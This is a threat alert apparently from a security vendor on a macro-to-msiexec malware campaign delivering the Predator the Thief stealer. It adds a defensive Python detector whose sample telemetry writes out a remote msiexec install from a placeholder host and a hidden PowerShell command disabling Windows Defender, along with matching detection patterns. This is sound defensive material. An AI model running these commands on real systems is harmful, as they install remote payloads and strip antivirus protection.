Rewterz Threat Alert – Ursnif Malware Delivered Via Office Macro Attachments
December 26, 2019
Rewterz Threat Alert – Legion Loader’s Nest of Malware
December 26, 2019
Severity
Medium
Analysis Summary
This alert covers a malspam email campaign carrying Word document attachments. The document uses macros to create and execute a BAT file, which in turn leverages msiexec to download, install, and execute malware. The downloaded file is an MSI payload that, once decompressed, drops several files onto the system. One of the files is the “Predator the Thief” stealer, capable of stealing stored passwords, cookies, credit card information, and crypto wallets and sending the data back to its C2 server. Another file executes PowerShell commands to reconfigure Windows Defender: it deactivates real-time protection, stops the application from automatically sending samples to Microsoft, and disables other defenses. A JavaScript file in the same folder downloads the same MSI payload, differing only in that it drops a 64-bit version of “Predator the Thief” instead. Various legitimate TeamViewer files are included alongside a malicious DLL used in a DLL hijacking attack to intercept various TeamViewer functions. Lastly, a ServHelper payload is included in the toolset.
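As an added detection example (not part of the Rewterz alert), the three most observable steps of the chain described above can be flagged from process-creation telemetry: an Office application spawning a script host, msiexec installing a package from a remote URL, and PowerShell tampering with Windows Defender preferences. Field names are loosely modelled on Sysmon Event ID 1 and the sample events below are constructed for this example; the URL and paths in them are placeholders, not indicators from the alert.

```python
"""Heuristic detections for Office-macro -> BAT -> msiexec -> Defender-tamper chains.
Field names follow Sysmon Event ID 1 loosely; all sample events are constructed."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "msiexec.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# msiexec pulling its package straight from an http(s) URL rather than a local path
REMOTE_MSI = re.compile(r"msiexec(\.exe)?\b.*https?://\S+\.msi", re.I)
# Set-MpPreference switches that weaken real-time protection or sample submission
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\b[^;|]*-(DisableRealtimeMonitoring|SubmitSamplesConsent"
    r"|MAPSReporting|DisableIOAVProtection)\b", re.I)

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(event):
    """Return the list of detection names that fire for one process-creation event."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")
    if REMOTE_MSI.search(cmd):
        hits.append("msiexec-remote-install")
    if DEFENDER_TAMPER.search(cmd):
        hits.append("defender-tamper")
    return hits

def scan(events):
    """Return (index, hits) for every event that triggers at least one detection."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

# Constructed sample telemetry: three malicious stages followed by two benign events.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\upd.bat"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://placeholder.invalid/WinDef.msi /qn"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
                    'Set-MpPreference -SubmitSamplesConsent 2"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "WINWORD.EXE /n invoice.docx"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\admin\Downloads\tool.msi /qn"},
]
```

Running `scan(SAMPLE_EVENTS)` flags only the first three events; the benign Word launch and the local MSI install produce no hits.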
Impact
- Exposure of sensitive information
- Credential theft
- Financial loss
Indicators of Compromise
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious of emails sent by unknown senders.
- Never click on links or attachments sent by unknown senders.
- Always check that the URL of the website you land on is legitimate when you click a link received via email.